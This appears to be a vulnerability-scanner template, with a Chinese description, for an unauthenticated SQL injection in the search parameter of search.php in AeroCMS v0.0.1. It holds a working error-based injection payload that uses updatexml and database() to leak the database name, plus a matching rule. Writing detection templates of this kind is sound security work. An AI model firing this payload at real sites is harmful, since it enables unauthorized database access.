id: aero-cms-front-end-search-function-sql-Injection

info:
  name: AeroCMS v0.0.1 前端搜索功能sql注入漏洞
  author: daffainfo
  severity: high
  verified: false
  description: AeroCMS v0.0.1发现可以通过search.php文件中的search参数进行sql注入。该漏洞允许攻击者在未经身份验证的情况下获得数据库管理员权限并访问数据库信息。
  reference:
    - https://github.com/MegaTKC/AeroCMS/issues/8

rules:
  r0:
    request:
      method: POST
      path: /search.php
      body: "search=%1'and updatexml(1,concat(0x7e,database(),0x7e),0)#"
    expression: response.status == 200 &&  response.body.bcontains(b'~aerocms~')
expression: r0()